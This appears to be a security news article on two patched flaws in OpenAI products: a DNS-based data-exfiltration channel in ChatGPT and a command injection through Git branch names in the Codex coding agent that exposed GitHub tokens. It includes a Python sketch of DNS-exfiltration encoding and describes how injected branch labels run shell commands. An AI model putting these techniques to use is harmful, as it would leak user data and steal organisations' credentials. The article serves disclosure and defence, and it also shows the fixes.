A critical flaw in OpenAI's coding agent, Codex, exposed developers' GitHub login credentials, raising serious enterprise security concerns: the vulnerability allowed attackers to access private code repositories without authorization. BeyondTrust Phantom Labs researchers discovered the now-patched flaw, which passed text from outside Codex's system directly into its own operating-system commands.
OpenAI has patched two significant security vulnerabilities affecting its widely used artificial intelligence platforms, ChatGPT and Codex, following responsible disclosures from cybersecurity researchers.
The first vulnerability: ChatGPT exposed as a hidden data exfiltration channel
Identified by Check Point researchers, this flaw exposed a novel method for silently extracting sensitive user data from ChatGPT sessions without the user's awareness.
The attack leveraged a DNS-based covert communication channel. By encoding data into DNS queries, attackers could transmit information externally without triggering security warnings or requiring user consent.
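The encoding step can be sketched as follows. This is an illustrative reconstruction of the general DNS-exfiltration technique, not Check Point's actual proof of concept; the function name and the `exfil.example.net` domain are invented for the example.

```python
import base64

def encode_for_dns(secret: str, attacker_domain: str, chunk: int = 40) -> list[str]:
    # Base32 keeps the payload within DNS's restricted character set
    # (letters and digits); padding is stripped to shorten the labels.
    encoded = base64.b32encode(secret.encode()).decode().rstrip("=").lower()
    # DNS labels are capped at 63 characters, so split into chunks.
    labels = [encoded[i:i + chunk] for i in range(0, len(encoded), chunk)]
    # Each lookup of "<chunk>.<attacker_domain>" reaches the attacker's
    # authoritative nameserver, leaking the chunk even if the query
    # never receives a meaningful response.
    return [f"{label}.{attacker_domain}" for label in labels]

queries = encode_for_dns("api_key=sk-123", "exfil.example.net")
```

Because DNS resolution is allowed in almost every network environment, these lookups blend into normal traffic, which is what makes the channel covert.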
The flaw allowed attackers to embed harmful logic directly into custom configurations, turning them into persistent, stealthy attack vectors. An attacker with edit access to a shared code repository could embed hidden instructions in a text label used to organize different versions of the code.
The second vulnerability: Codex flaw enabled GitHub token theft
BeyondTrust Phantom Labs researchers found that Codex passed text from outside its system directly into its own operating-system commands, a classic command-injection pattern.
The vulnerability also affected Codex’s code review feature. When a developer tags Codex in a GitHub code review, it launches a separate process to analyze the code.
The researchers said that this process was vulnerable to the same attack and that exploiting it could yield a credential with access across an entire organization’s repositories, not just a single user’s account.
Issue addressed by OpenAI
OpenAI classified the vulnerability as critical and issued an initial fix a week after its disclosure, followed by a second, more comprehensive fix a month later. The patch added stronger input validation, shell escaping, and token controls.
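The combination of input validation and shell escaping can be sketched as below. The allowlist pattern and the `git` command template are illustrative assumptions, not OpenAI's actual fix.

```python
import re
import shlex

# Illustrative allowlist: permit only characters normally found in
# git branch names (this pattern is an assumption, not OpenAI's rule).
ALLOWED_BRANCH = re.compile(r"^[A-Za-z0-9._/-]+$")

def checkout_args(branch: str) -> list[str]:
    # 1. Input validation: reject anything outside the allowlist.
    if not ALLOWED_BRANCH.match(branch):
        raise ValueError(f"rejected branch name: {branch!r}")
    # 2. Avoid the shell entirely: passing arguments as a list means
    #    the OS never interprets metacharacters like ';' or '$( )'.
    return ["git", "checkout", branch]

# 3. If a shell string is truly unavoidable, escaping neutralizes
#    metacharacters instead:
quoted = shlex.quote("main; rm -rf /")  # -> "'main; rm -rf /'"
```

Preferring the argument-list form over a shell string removes the injection surface entirely, which is why escaping is best treated as a fallback rather than the primary defense.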
Exploiting developer workflows and creating blind spots
Once attackers gained access to a shared repository, they could designate the compromised label as the default, exposing every developer working on that project. Such vulnerabilities create “blind spots” in AI systems, where neither users nor the platform can easily detect misuse or misconfigurations.
Experts say such incidents highlight systemic risks as AI systems evolve into full-scale computing environments.
How a developer can be affected by such blind spots in AI systems
According to experts, a developer's workflow can be exploited as follows. The problem stems from the way Codex processes branch names during task creation: whenever developers make changes to a GitHub project, they typically do so on a separate, discrete branch. An attacker can manipulate the branch parameter to inject arbitrary shell commands while the environment is being set up, and those commands can run any code, including malicious payloads. This creates a highly scalable attack vector, particularly in collaborative or open-source environments.
AI Coding Agents
AI coding agents run in live execution environments with access to sensitive credentials and organizational resources, which makes them attractive targets. As AI agents become increasingly integrated into developer workflows, their security must be treated with the same importance as any other application security.
Sources: OpenAI Codex Vulnerability Exposes GitHub Tokens—A Developer’s Nightmare | AI News